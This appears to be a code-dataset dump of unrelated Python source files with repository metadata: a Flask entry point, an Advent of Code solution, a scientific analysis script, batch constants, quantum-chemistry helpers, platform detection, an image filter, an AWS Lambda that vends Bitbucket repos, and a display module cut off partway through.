hexsha stringlengths 40 40 | size int64 5 2.06M | ext stringclasses 10 values | lang stringclasses 1 value | max_stars_repo_path stringlengths 3 248 | max_stars_repo_name stringlengths 5 125 | max_stars_repo_head_hexsha stringlengths 40 78 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 191k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 3 248 | max_issues_repo_name stringlengths 5 125 | max_issues_repo_head_hexsha stringlengths 40 78 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 67k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 3 248 | max_forks_repo_name stringlengths 5 125 | max_forks_repo_head_hexsha stringlengths 40 78 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 5 2.06M | avg_line_length float64 1 1.02M | max_line_length int64 3 1.03M | alphanum_fraction float64 0 1 | count_classes int64 0 1.6M | score_classes float64 0 1 | count_generators int64 0 651k | score_generators float64 0 1 | count_decorators int64 0 990k | score_decorators float64 0 1 | count_async_functions int64 0 235k | score_async_functions float64 0 1 | count_documentation int64 0 1.04M | score_documentation float64 0 1 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
4401048e9f96083e7a2404057ad05e3545075fdb | 173 | py | Python | run.py | BloomTech-Labs/tally-ai-ds | 09d7a207bf5e6f9de2d615ad078cebb8340abcd8 | [
"MIT"
] | 8 | 2020-01-08T18:16:20.000Z | 2020-06-30T23:49:38.000Z | run.py | Lambda-School-Labs/tally-ai-ds | 09d7a207bf5e6f9de2d615ad078cebb8340abcd8 | [
"MIT"
] | 5 | 2021-03-30T13:48:15.000Z | 2021-09-22T19:11:46.000Z | run.py | BloomTech-Labs/tally-ai-ds | 09d7a207bf5e6f9de2d615ad078cebb8340abcd8 | [
"MIT"
] | 5 | 2020-02-02T04:27:26.000Z | 2020-06-05T05:12:28.000Z | """ Entry point for the Yelp API Flask Reviews for Tally-ai"""
from yelpapi.app import create_app
# Build the Flask application once at import time via the app-factory helper.
APP = create_app()
if __name__=='__main__':
    # 0.0.0.0 binds the dev server on all interfaces (container/VM friendly).
    APP.run(host="0.0.0.0")
| 19.222222 | 62 | 0.693642 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 81 | 0.468208 |
44012135b92e94a6e5cc6632123a24e83038d617 | 945 | py | Python | day6.py | xpqz/aoc-17 | 1872c13933b1b37e294d5e9660db3b2a48c837bd | [
"Apache-2.0"
] | null | null | null | day6.py | xpqz/aoc-17 | 1872c13933b1b37e294d5e9660db3b2a48c837bd | [
"Apache-2.0"
] | null | null | null | day6.py | xpqz/aoc-17 | 1872c13933b1b37e294d5e9660db3b2a48c837bd | [
"Apache-2.0"
] | null | null | null | from itertools import cycle
import re
def read_data(filename="data/input6.data"):
    """Read *filename* and return every (possibly negative) integer it contains."""
    with open(filename) as handle:
        raw = handle.read()
    return [int(token) for token in re.findall(r"-?\d+", raw)]
def maxindex(data):
    """Return (max_value, index) for *data*, taking the FIRST index on ties."""
    best_value, best_index = data[0], 0
    for index, value in enumerate(data):
        if value > best_value:
            best_value, best_index = value, index
    return best_value, best_index
def bank_order(dlen, pivot):
    """Return the bank indices in redistribution order, starting just after *pivot*."""
    if pivot == dlen:
        # degenerate case: no rotation requested
        return list(range(dlen))
    # walk the banks circularly, beginning at pivot + 1
    return [(pivot + 1 + offset) % dlen for offset in range(dlen)]
if __name__ == "__main__":
    # Memory-reallocation puzzle: repeatedly empty the largest bank and
    # redistribute its blocks round-robin until a configuration repeats.
    d = read_data()
    count = 0
    # configuration -> redistribution step at which it was first seen
    states = {tuple(d): 0}
    while True:
        m, pivot = maxindex(d)
        d[pivot] = 0
        # hand out the m removed blocks one at a time, starting after pivot
        for bank in cycle(bank_order(len(d), pivot)):
            if m == 0:
                break
            d[bank] += 1
            m -= 1
        count += 1
        state = tuple(d)
        if state in states:
            break
        states[state] = count
    # part 1: total steps until a repeat; part 2: length of the loop
    print(count)
    print(count - states[state])
| 19.6875 | 63 | 0.514286 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 36 | 0.038095 |
44013f3f3af8e458590def0721c1609bc2e07d75 | 1,026 | py | Python | analysis/Therapy_abi-initialcondition.py | Harshavardhan-BV/Cancer-compe-strat | e4decacd5779e85a68c81d0ce3bedf42dea2964f | [
"MIT"
] | 1 | 2020-10-18T15:54:26.000Z | 2020-10-18T15:54:26.000Z | analysis/Therapy_abi-initialcondition.py | Harshavardhan-BV/Cancer-compe-strat | e4decacd5779e85a68c81d0ce3bedf42dea2964f | [
"MIT"
] | null | null | null | analysis/Therapy_abi-initialcondition.py | Harshavardhan-BV/Cancer-compe-strat | e4decacd5779e85a68c81d0ce3bedf42dea2964f | [
"MIT"
] | null | null | null | import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import common_fn as cf
import seaborn as sns
plt.rcParams["svg.hashsalt"]=0
# Parameter-sweep driver: prepares output directories, then runs the
# timeseries and equilibrium analyses (via common_fn) over every
# (initial ratio, total cell count) combination for each therapy case.
pre_path='EnvEq/All3/'
parm_format='{:.2e}'
parm_name='therapy_abi-Tneg_initratio-Totcell'
parm_name_array=['Tneg_initratio','Totcell']
post_path1='o2-Null_test-HE/'
parm_name1=parm_name+'/'+post_path1
cf.mkdirs(pre_path=pre_path,parm_name=parm_name1)
#iterator over these
ir_arr=np.logspace(-1,-3,5)
tot_cell_arr=np.array([1000,2000,4000])
cases=['No','AT','AT_nn','MT','SOC']
# build the cartesian product of (ir, tc) pairs, one row per combination
parms_array=np.empty([0,2])
for ir in ir_arr:
    for tc in tot_cell_arr:
        parms_array=np.append(parms_array,[[ir,tc]],axis=0)
for case in cases:
    post_path=post_path1+case+'-'
    cf.timeseries(pre_path=pre_path,parm_name=parm_name,parm_array=parms_array,parm_format=parm_format,post_path=post_path)
# NOTE(review): this call sits OUTSIDE the loop, so it only uses post_path
# from the LAST case ('SOC-'); confirm it was not meant to run per case.
df=cf.eq_values(pre_path=pre_path,parm_name=parm_name,parm_array=parms_array,parm_format=parm_format,parm_name_array=parm_name_array,post_path=post_path,ttp=True,limit=9000)
| 34.2 | 177 | 0.774854 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 164 | 0.159844 |
44046b1afd25c838028ace50bbff2629930820b6 | 745 | py | Python | batch/batch/globals.py | vrautela/hail | 7db6189b5b1feafa88452b8470e497d9505d9a46 | [
"MIT"
] | null | null | null | batch/batch/globals.py | vrautela/hail | 7db6189b5b1feafa88452b8470e497d9505d9a46 | [
"MIT"
] | null | null | null | batch/batch/globals.py | vrautela/hail | 7db6189b5b1feafa88452b8470e497d9505d9a46 | [
"MIT"
] | null | null | null | states = {'Pending', 'Ready', 'Creating', 'Running', 'Cancelled', 'Error', 'Failed', 'Success'}
# States in which a batch/job is finished (successfully or not).
complete_states = ('Cancelled', 'Error', 'Failed', 'Success')
# State machine for jobs: current state -> set of states it may move to.
# Terminal states map to the empty set.
valid_state_transitions = {
    'Pending': {'Ready'},
    'Ready': {'Creating', 'Running', 'Cancelled', 'Error'},
    'Creating': {'Ready', 'Running'},
    'Running': {'Ready', 'Cancelled', 'Error', 'Failed', 'Success'},
    'Cancelled': set(),
    'Error': set(),
    'Failed': set(),
    'Success': set(),
}
# Task phase names -- presumably the stages each job runs through; verify at call sites.
tasks = ('input', 'main', 'output')
memory_types = ('lowmem', 'standard', 'highmem')
# Maximum accepted HTTP request body: 8 MiB.
HTTP_CLIENT_MAX_SIZE = 8 * 1024 * 1024
# Format/version markers -- bump when the corresponding layout changes.
BATCH_FORMAT_VERSION = 6
STATUS_FORMAT_VERSION = 5
INSTANCE_VERSION = 22
# Largest allowed persistent SSD, in GiB (64 TiB).
MAX_PERSISTENT_SSD_SIZE_GIB = 64 * 1024
RESERVED_STORAGE_GB_PER_CORE = 5
| 26.607143 | 95 | 0.636242 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 325 | 0.436242 |
4404ab7f872b125d775084569215a89c507428c5 | 8,037 | py | Python | decodense/tools.py | luna-component/decodense | 2579b7a3b7500b32ab231ebacb35c91e87e96735 | [
"MIT"
] | null | null | null | decodense/tools.py | luna-component/decodense | 2579b7a3b7500b32ab231ebacb35c91e87e96735 | [
"MIT"
] | null | null | null | decodense/tools.py | luna-component/decodense | 2579b7a3b7500b32ab231ebacb35c91e87e96735 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*
"""
tools module
"""
__author__ = 'Dr. Janus Juul Eriksen, University of Bristol, UK'
__maintainer__ = 'Dr. Janus Juul Eriksen'
__email__ = 'janus.eriksen@bristol.ac.uk'
__status__ = 'Development'
import sys
import os
import copy
import numpy as np
try:
import opt_einsum as oe
OE_AVAILABLE = True
except ImportError:
OE_AVAILABLE = False
from subprocess import Popen, PIPE
from pyscf import gto, scf, dft, symm, lib
from pyscf import tools as pyscf_tools
from typing import Tuple, List, Dict, Union
MAX_CYCLE = 100
NATORB_THRES = 1.e-12
class Logger(object):
    """Duplicate every write to an append-mode log file and, optionally, stdout."""

    def __init__(self, output_file, both=True) -> None:
        """Open `output_file` for appending; `both=True` also mirrors writes to stdout."""
        self.terminal = sys.stdout
        self.log = open(output_file, 'a')
        self.both = both

    def write(self, message) -> None:
        """Send `message` to every active output stream (log file first)."""
        streams = [self.log]
        if self.both:
            streams.append(self.terminal)
        for stream in streams:
            stream.write(message)

    def flush(self) -> None:
        """Stream-protocol stub; flushing is left to the underlying files."""
        pass
def git_version() -> str:
    """Return the current git revision hash, or "Unknown" when git is unavailable."""
    def _run_git(cmd):
        # Pass only the essential variables and force the C locale so the
        # subprocess output is stable and ASCII-decodable.
        env = {}
        for var in ['SYSTEMROOT', 'PATH', 'HOME']:
            value = os.environ.get(var)
            if value is not None:
                env[var] = value
        # LANGUAGE is used on win32
        env['LANGUAGE'] = 'C'
        env['LANG'] = 'C'
        env['LC_ALL'] = 'C'
        proc = Popen(cmd, stdout=PIPE, env=env,
                     cwd=os.path.dirname(__file__))
        return proc.communicate()[0]

    try:
        revision = _run_git(['git', 'rev-parse', 'HEAD']).strip().decode('ascii')
    except OSError:
        revision = "Unknown"
    return revision
def dim(mo_occ: np.ndarray) -> Tuple[np.ndarray, np.ndarray]:
    """
    determine molecular dimensions

    Returns the indices of entries with non-zero (absolute) occupation for
    the alpha and beta channels, respectively.
    """
    alpha_idx = np.where(np.abs(mo_occ[0]) > 0.)[0]
    beta_idx = np.where(np.abs(mo_occ[1]) > 0.)[0]
    return alpha_idx, beta_idx
def mf_info(mf: Union[scf.hf.SCF, dft.rks.KohnShamDFT]) -> Tuple[Tuple[np.ndarray, np.ndarray], \
                                                                 Tuple[np.ndarray, np.ndarray]]:
    """
    retrieve mf information (mo coefficients & occupations)

    Returns ((mo_coeff_alpha, mo_coeff_beta), (mo_occ_alpha, mo_occ_beta)),
    restricted to orbitals with non-zero occupation.
    """
    # mo occupations
    # 1d mo_occ (shared orbitals, e.g. restricted calc -- pyscf convention):
    # expand into per-spin vectors of ones (alpha: occ > 0, beta: occ > 1)
    if np.asarray(mf.mo_occ).ndim == 1:
        mo_occ = (np.ones(np.count_nonzero(0. < mf.mo_occ)), np.ones(np.count_nonzero(1. < mf.mo_occ)))
    else:
        # per-spin mo_occ: keep only the non-zero occupations of each channel
        mo_occ = (mf.mo_occ[0][np.nonzero(mf.mo_occ[0])], mf.mo_occ[1][np.nonzero(mf.mo_occ[1])])
    # dimensions
    alpha, beta = dim(mo_occ)
    # mo coefficients
    # 2d mo_coeff: one coefficient matrix shared by both spin channels
    if np.asarray(mf.mo_coeff).ndim == 2:
        mo_coeff = (mf.mo_coeff[:, alpha], mf.mo_coeff[:, beta])
    else:
        mo_coeff = (mf.mo_coeff[0][:, alpha], mf.mo_coeff[1][:, beta])
    return mo_coeff, mo_occ
def orbsym(mol, mo_coeff):
    """
    this functions returns orbital symmetries

    Falls back to the trivial label 'A' for every orbital whenever symmetry
    labelling fails (e.g. no symmetry information is available on `mol`).
    `mo_coeff` is either a single (nao, nmo) array or a sequence of such
    arrays (one per spin channel).
    """
    if isinstance(mo_coeff, np.ndarray) and mo_coeff.ndim == 2:
        # single coefficient matrix
        try:
            return symm.label_orb_symm(mol, mol.irrep_name, mol.symm_orb, mo_coeff)
        except Exception:
            # bare `except:` replaced: don't swallow KeyboardInterrupt/SystemExit
            return np.array(['A'] * mo_coeff.shape[1])
    # sequence of coefficient matrices; the original duplicated this branch
    # verbatim for ndarray and non-ndarray inputs -- merged here
    try:
        return np.array([symm.label_orb_symm(mol, mol.irrep_name, mol.symm_orb, c) for c in mo_coeff])
    except Exception:
        return np.array([['A'] * c.shape[1] for c in mo_coeff])
def make_rdm1(mo: np.ndarray, occup: np.ndarray) -> np.ndarray:
    """
    this function returns an 1-RDM (in ao basis) corresponding to given mo(s)

    Computes sum_p occup[p] * mo[:, p] mo[:, p]^T via an einsum contraction.
    """
    weighted_mo = mo * occup
    return contract('ip,jp->ij', weighted_mo, mo)
def make_natorb(mol: gto.Mole, mo_coeff: np.ndarray, \
                rdm1: np.ndarray, thres: float = NATORB_THRES) -> Tuple[Tuple[np.ndarray, np.ndarray], \
                                                                        Tuple[np.ndarray, np.ndarray]]:
    """
    this function returns no coefficients and occupations corresponding
    to given mo coefficients and rdm1

    Occupations below `thres` (in absolute value) are discarded, together
    with their natural orbitals.
    """
    # reshape mo_coeff and rdm1
    # spin-free inputs are duplicated into an (alpha, beta) pair; a 2d rdm1
    # is halved so the two spin channels sum back to the original density
    if mo_coeff.ndim == 2:
        c = np.asarray((mo_coeff,) * 2)
    else:
        c = mo_coeff
    if rdm1.ndim == 2:
        d = np.array([rdm1, rdm1]) * .5
    else:
        d = rdm1
    # overlap matrix
    s = mol.intor_symmetric('int1e_ovlp')
    # ao to mo transformation of dm
    # x indexes the spin channel: C^T S D S C per spin
    rdm1_mo = contract('xpi,pq,xqr,rs,xsj->xij', c, s, d, s, c)
    # diagonalize rdm1_mo
    occ_no, u = np.linalg.eigh(rdm1_mo)
    # transform to no basis
    mo_no = contract('xip,xpj->xij', c, u)
    # retain only significant nos
    return (mo_no[0][:, np.where(np.abs(occ_no[0]) >= thres)[0]], mo_no[1][:, np.where(np.abs(occ_no[1]) >= thres)[0]]), \
           (occ_no[0][np.where(np.abs(occ_no[0]) >= thres)], occ_no[1][np.where(np.abs(occ_no[1]) >= thres)])
def write_rdm1(mol: gto.Mole, part: str, \
               mo_coeff: np.ndarray, mo_occ: np.ndarray, fmt: str, \
               weights: List[np.ndarray], \
               suffix: str = '') -> None:
    """
    this function writes a 1-RDM as a numpy or cube (default) file

    One file is written per atom; each atomic 1-RDM is the weighted sum of
    orbital-specific 1-RDMs, using `weights[spin][orbital][atom]`.
    """
    # assertion
    assert part == 'atoms', '`write_rdm1` function only implemented for `atoms` partitioning'
    assert fmt in ['cube', 'numpy'], 'fmt arg to `write_rdm1` must be `cube` or `numpy`'
    # molecular dimensions
    alpha, beta = dim(mo_occ)
    # compute total 1-RDM (AO basis)
    rdm1_tot = np.array([make_rdm1(mo_coeff[0], mo_occ[0]), make_rdm1(mo_coeff[1], mo_occ[1])])
    # loop over atoms
    for a in range(mol.natm):
        # atom-specific rdm1
        rdm1_atom = np.zeros_like(rdm1_tot)
        # loop over spins
        for i, spin_mo in enumerate((alpha, beta)):
            # loop over spin-orbitals
            for m, j in enumerate(spin_mo):
                # get orbital(s)
                # reshape keeps a 2d (nao, 1) column so make_rdm1 broadcasts
                orb = mo_coeff[i][:, j].reshape(mo_coeff[i].shape[0], -1)
                # orbital-specific rdm1
                rdm1_orb = make_rdm1(orb, mo_occ[i][j])
                # weighted contribution to rdm1_atom
                rdm1_atom[i] += rdm1_orb * weights[i][m][a]
        if fmt == 'cube':
            # write rdm1_atom as cube file
            # spin channels are summed; filename encodes element symbol + index
            pyscf_tools.cubegen.density(mol, f'atom_{mol.atom_symbol(a).upper():s}{a:d}_rdm1{suffix:}.cube', \
                                        np.sum(rdm1_atom, axis=0))
        else:
            # write rdm1_atom as numpy file
            np.save(f'atom_{mol.atom_symbol(a).upper():s}{a:d}_rdm1{suffix:}.npy', np.sum(rdm1_atom, axis=0))
def res_add(res_a, res_b):
    """
    this function adds two result dictionaries

    Keys are taken from `res_a`; `res_b` must contain the same keys.
    """
    # iterate the dict directly (idiomatic form of `.keys()`)
    return {key: res_a[key] + res_b[key] for key in res_a}
def res_sub(res_a, res_b):
    """
    this function subtracts two result dictionaries

    Keys are taken from `res_a`; `res_b` must contain the same keys.
    """
    # iterate the dict directly (idiomatic form of `.keys()`)
    return {key: res_a[key] - res_b[key] for key in res_a}
def contract(eqn, *tensors):
    """Evaluate the einsum `eqn` over `tensors`, preferring opt_einsum when installed."""
    if not OE_AVAILABLE:
        # numpy fallback; let numpy search for a good contraction order
        return np.einsum(eqn, *tensors, optimize=True)
    return oe.contract(eqn, *tensors)
| 34.493562 | 126 | 0.528307 | 667 | 0.082991 | 0 | 0 | 0 | 0 | 0 | 0 | 2,125 | 0.264402 |
4409f782696f9bbe7a35ede6326445dc2cdc8431 | 949 | py | Python | needy/platforms/__init__.py | carlbrown/needy | 5a70726c9846f86a88be896ec39740296d503835 | [
"MIT"
] | 65 | 2015-07-21T01:40:17.000Z | 2019-06-10T10:46:28.000Z | needy/platforms/__init__.py | bittorrent/needy | 31e57ad09d5fc22126e10b735c586262a50139d7 | [
"MIT"
] | 110 | 2015-07-21T01:41:40.000Z | 2017-01-18T23:13:30.000Z | needy/platforms/__init__.py | bittorrent/needy | 31e57ad09d5fc22126e10b735c586262a50139d7 | [
"MIT"
] | 4 | 2015-07-20T02:45:43.000Z | 2016-07-31T21:48:39.000Z | import sys
from .generic import GenericPlatform
from .android import AndroidPlatform
from .osx import OSXPlatform
from .ios import iOSPlatform, iOSSimulatorPlatform
from .tvos import tvOSPlatform, tvOSSimulatorPlatform
from .windows import WindowsPlatform
def available_platforms():
    """Return a mapping of platform identifier -> platform class usable on this host."""
    candidates = [GenericPlatform, AndroidPlatform]
    if sys.platform == 'darwin':
        candidates += [
            OSXPlatform,
            iOSPlatform,
            iOSSimulatorPlatform,
            tvOSPlatform,
            tvOSSimulatorPlatform,
        ]
    elif sys.platform == 'win32':
        candidates.append(WindowsPlatform)
    return {platform.identifier(): platform for platform in candidates}
def host_platform():
    """Return the platform class that matches the running operating system."""
    native = {'darwin': OSXPlatform, 'win32': WindowsPlatform}
    return native.get(sys.platform, GenericPlatform)
| 24.973684 | 54 | 0.650158 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 30 | 0.031612 |
440a1d5175fa5348e4a99237450eda9219084497 | 1,932 | py | Python | starfish/pipeline/filter/white_tophat.py | joshmoore/starfish | db38168da35f01ad1541f67aebe49a083d12e224 | [
"MIT"
] | null | null | null | starfish/pipeline/filter/white_tophat.py | joshmoore/starfish | db38168da35f01ad1541f67aebe49a083d12e224 | [
"MIT"
] | null | null | null | starfish/pipeline/filter/white_tophat.py | joshmoore/starfish | db38168da35f01ad1541f67aebe49a083d12e224 | [
"MIT"
] | 1 | 2019-03-12T23:39:55.000Z | 2019-03-12T23:39:55.000Z | import numpy as np
from ._base import FilterAlgorithmBase
class WhiteTophat(FilterAlgorithmBase):
    """
    Performs "white top hat" filtering of an image to enhance spots. "White top hat filtering" finds spots that are both
    smaller and brighter than their surroundings.
    See Also
    --------
    https://en.wikipedia.org/wiki/Top-hat_transform
    """
    def __init__(self, disk_size, **kwargs):
        """Instance of a white top hat morphological masking filter which masks objects larger than `disk_size`
        Parameters
        ----------
        disk_size : int
            diameter of the morphological masking disk in pixels
        """
        # extra kwargs are accepted but ignored
        self.disk_size = disk_size
    @classmethod
    def add_arguments(cls, group_parser):
        """Register this filter's CLI options on the given argparse group."""
        group_parser.add_argument(
            "--disk-size", default=15, type=int, help="diameter of morphological masking disk in pixels")
    def filter(self, stack) -> None:
        """Perform in-place filtering of an image stack and all contained aux images
        Parameters
        ----------
        stack : starfish.Stack
            Stack to be filtered
        """
        from scipy.ndimage.filters import maximum_filter, minimum_filter
        from skimage.morphology import disk
        def white_tophat(image):
            # the subtraction below relies on unsigned integer images
            if image.dtype.kind != "u":
                raise TypeError("images should be stored in an unsigned integer array")
            structuring_element = disk(self.disk_size)
            # min-then-max filtering is a morphological opening of the image
            min_filtered = minimum_filter(image, footprint=structuring_element)
            max_filtered = maximum_filter(min_filtered, footprint=structuring_element)
            # white tophat = image - opening; np.minimum clamps the subtrahend
            # per pixel so the unsigned subtraction can never underflow
            filtered_image = image - np.minimum(image, max_filtered)
            return filtered_image
        stack.image.apply(white_tophat)
        # apply to aux dict too.
        for auxiliary_image in stack.auxiliary_images.values():
            auxiliary_image.apply(white_tophat)
| 33.310345 | 120 | 0.652174 | 1,870 | 0.967909 | 0 | 0 | 195 | 0.100932 | 0 | 0 | 841 | 0.4353 |
440b1a3e84c4b75ee948d622c559e449e45598fa | 8,082 | py | Python | lambda/lambda/avm-create-bitbucket-repo/avm-create-bitbucket.py | khiann/terraform-aws-avm | 9fbf3d97a26117450ad9e93c8f949727df4f562c | [
"MIT-0"
] | null | null | null | lambda/lambda/avm-create-bitbucket-repo/avm-create-bitbucket.py | khiann/terraform-aws-avm | 9fbf3d97a26117450ad9e93c8f949727df4f562c | [
"MIT-0"
] | null | null | null | lambda/lambda/avm-create-bitbucket-repo/avm-create-bitbucket.py | khiann/terraform-aws-avm | 9fbf3d97a26117450ad9e93c8f949727df4f562c | [
"MIT-0"
] | 1 | 2021-09-01T18:28:55.000Z | 2021-09-01T18:28:55.000Z | import json
import stashy
import avm_common
import urllib3
import boto3
import base64
from botocore.exceptions import ClientError
urllib3.disable_warnings()
# import pprint
# pp = pprint.PrettyPrinter(indent=4)
class gitMgr:
    """Class that manages access to bitbucket resources"""
    def __init__(self):
        # Fetch Bitbucket credentials and open an (unverified-TLS) stashy session.
        self._token = self.get_token()
        secret = self._token
        self._stashy = stashy.connect(secret["url"],secret["user"], secret["password"], verify=False)
    def get_token(self):
        """Return the Bitbucket credential dict (url/user/password) from Secrets Manager."""
        return avm_common.get_secret("bitbucket")
    def get_repo(self, repo_name,project=None):
        """Return the stashy repo resource named `repo_name` (optionally scoped to
        `project`), or None when it cannot be found unambiguously."""
        print(f"Get the repo {repo_name} in project {project}")
        import inspect
        try:
            if project:
                # search the whole server for an exact (name, project) match
                repos = [r for r in self._stashy.repos.all() if (r["name"] == repo_name and r["project"]["key"] == project)]
                for r in repos:
                    print(f'{r["project"]["key"]}')
                if len(repos) == 1:
                    print(f"Trying to find {repo_name} in {project}")
                    repo = self._stashy.projects[project].repos[repo_name]
                    #pp.pprint(inspect.getmembers(repo))
                    return repo
            else:
                # no project given: accept the repo only if its name is unique server-wide
                repos = [r for r in self._stashy.repos.all() if r["name"] == repo_name ]
                if len(repos) == 1:
                    project = repos[0]["project"]["key"]
                    print(f"Found {project}/{repo_name}")
                    return self._stashy.projects[project].repos[repo_name]
                else:
                    return
        except:
            # NOTE(review): try/except that only re-raises is a no-op wrapper
            raise
    def get_baseline_template_repo(self, repo_name):
        """Map a vended repo name onto its baseline template repo name, or None.

        NOTE(review): keys are matched against '-'-separated segments of
        repo_name, yet several keys contain '_' -- confirm repo naming makes
        these reachable."""
        print("starting get_baseline_template_repo function...")
        baseline_map = {
            "sandbox" : "sandbox-account",
            "core_master_payer" : "core-master-payer",
            "core_logging" : "core-logging",
            "core_security" : "core-security",
            "core_shared_services" : "core-shared-services",
            "core_network" : "core-network",
            "baseline" : "application-account",
            "app" : "application-account"
        }
        baseline_key = None
        for key in repo_name.split("-"):
            if key in baseline_map.keys():
                baseline_key = baseline_map[key]
                break
        return baseline_key
    def fork_repo(self,source_repo_name,target_project,target_repo_name):
        """Fork the template repo into `target_project`/`target_repo_name`,
        unless the target already exists (then this is a no-op)."""
        print("starting clone_repo function...")
        # Steps
        # 1. Check if repo exists
        target_repo = self.get_repo(target_repo_name,target_project)
        print(target_repo)
        if not target_repo:
            # source templates live in a dedicated project (SSM parameter)
            templates_project = avm_common.get_param("project_for_templates")
            src_repo = self.get_repo(source_repo_name, templates_project)
            if src_repo:
                print(f"Create a new repo {target_repo_name} in {target_project}")
                try:
                    response = src_repo.fork(target_repo_name,target_project)
                    return response
                except stashy.errors.GenericException as e:
                    raise e
            else:
                print(f"{source_repo_name} repo not found")
        else:
            print(f"{target_repo_name} repo already exists. Nothing to fork")
    def create_group(self, group):
        """Create a group in Bitbucket using the Stashy API."""
        try:
            return self._stashy.admin.groups.add(group)
        except stashy.errors.GenericException as e:
            # Does the group already exist (409)?
            # Stashy can't handle it, so do it explicitly:
            msg = e.data["errors"][0]["exceptionName"]
            if (msg == "com.atlassian.bitbucket.IntegrityException"):
                print(f"Group {group} already exists, not creating...")
            else:
                raise e
    def grant_repository_access(self, project, repository, group, permission):
        """Grant a group access to a repository."""
        try:
            return self._stashy.projects[project].repos[repository].permissions.groups.grant(group, permission)
        except stashy.errors.GenericException as e:
            raise e
def get_repository_access_for_role(role_name, repository_type):
    """Return a Bitbucket permission level for a *role* (not a team) to a particular repository.

    Unknown role names or repository types yield None.
    """
    access_for_roles = {
        "tlz_admin": {"baseline": "REPO_WRITE", "resource": "REPO_ADMIN"},
        "tlz_developer": {"baseline": "REPO_WRITE", "resource": "REPO_WRITE"},
        "tlz_developer_ro": {"baseline": "REPO_READ", "resource": "REPO_READ"},
    }
    # chained .get() replaces the original try/except KeyError -> None
    return access_for_roles.get(role_name, {}).get(repository_type)
def lambda_handler(event, context):
    """Vend Bitbucket repos for a new account: fork the baseline template,
    optionally fork a resources repo, and grant Okta group permissions.

    `event` must carry "AccountId"; `context` is the unused Lambda context."""
    repo_name = None
    account_Id = event["AccountId"]
    account_info = avm_common.get_account_details(account_Id)
    account_details = account_info["org_details"]
    #pp.pprint(account_details)
    baseline_details = json.loads(account_details["baseline_details"])
    account_type = account_details["accountType"]
    baseline_repo = baseline_details["git"]
    # repo name = last path segment of the git URL, without ".git"
    repo_name = baseline_repo.split("/")[-1].replace(".git","")
    print(repo_name)
    ## Might want to make this a global variable
    vended_baselines_project = avm_common.get_param("vended_baselines_project")
    #project = "tlz-vb"
    #pp.pprint(project.upper())
    git = gitMgr()
    template = git.get_baseline_template_repo(repo_name)
    print(template)
    # Create baseline repo
    git.fork_repo(template,vended_baselines_project.upper(),repo_name)
    #print(account_details)
    try:
        account_request = json.loads(account_details["account_request"])
        environment_type = account_request["intEnvironment"].lower()
    except Exception:
        # missing/invalid account_request falls back to the literal "null"
        environment_type = "null"
    user_managed_roles = avm_common.get_delegated_user_managed_roles()
    group_list = avm_common.generate_okta_group_names(account_Id, account_type, environment_type, account_details["alias"].lower())
    # grant each role-suffixed group its baseline-repo permission level
    for group in group_list:
        for role in user_managed_roles:
            if group.endswith(role):
                print(f"Group to be granted permissions to Bitbucket baseline repo: {group}")
                git.create_group(group)
                git.grant_repository_access(vended_baselines_project.upper(), repo_name, group, get_repository_access_for_role(role, "baseline"))
    # TODO: Add merge check restriction
    if avm_common.resource_workspace_required(account_type):
        # Create an additional repo for the application and sandbox
        # app-repo template
        app_details = json.loads(account_details["app_details"])
        print("App details")
        print(app_details)
        app_repo = app_details["git"]
        repo_name = app_repo.split("/")[-1].replace(".git","")
        print(repo_name)
        vended_applications_project = avm_common.get_param("vended_applications_project")
        template = f"{account_type.lower()}-resources"
        git.fork_repo(template,vended_applications_project.upper(),repo_name)
        # same group grants, but against the resources repo permission map
        for group in group_list:
            for role in user_managed_roles:
                if group.endswith(role):
                    print(f"Group to be granted permissions to Bitbucket resource repo: {group}")
                    git.grant_repository_access(vended_applications_project.upper(), repo_name, group, get_repository_access_for_role(role, "resource"))
if __name__ == "__main__":
    # Local test harness: build a fake Lambda event from the CLI and invoke
    # the handler directly (no AWS runtime involved).
    from optparse import OptionParser
    import pprint
    import json
    import sys
    parser = OptionParser()
    parser.add_option("-a", "--account_number", dest="account_number", help="Account number to test")
    pp = pprint.PrettyPrinter(indent=4)
    (options, args) = parser.parse_args(sys.argv)
    pp.pprint(options)
    event = { "AccountId": f"{options.account_number}"}
    lambda_handler(event,None)
| 38.855769 | 152 | 0.623113 | 4,016 | 0.496907 | 0 | 0 | 0 | 0 | 0 | 0 | 2,262 | 0.279881 |
440b7babfdd9105d004432019375c7b06dd9899b | 6,905 | py | Python | artsci2019/display.py | fhennig/artsci-2019 | 273ea80cde5e4af0a9dfedbff608f29de4f78afa | [
"MIT"
] | 5 | 2019-05-27T10:00:18.000Z | 2020-01-23T13:22:37.000Z | artsci2019/display.py | fhennig/artsci-2019 | 273ea80cde5e4af0a9dfedbff608f29de4f78afa | [
"MIT"
] | 2 | 2019-05-21T16:05:28.000Z | 2019-05-26T14:52:22.000Z | artsci2019/display.py | fhennig/artsci-2019 | 273ea80cde5e4af0a9dfedbff608f29de4f78afa | [
"MIT"
] | null | null | null | import datetime
import cv2
import numpy as np
from artsci2019.lib.frame_checker import FrameChecker
from artsci2019.lib.util import scale_frame, scale_point, is_in_frame
from artsci2019.lib.face_recog import get_faces
from artsci2019.lib.sound import SoundPlayer
def draw_checked_frame(frame, checked_frame, factor):
    """Overlay the face-check guide lines on `frame` (in place).

    Each segment is green when its check passed and red when it failed:
    eye line (width check), centre offset (centre check, thicker), and
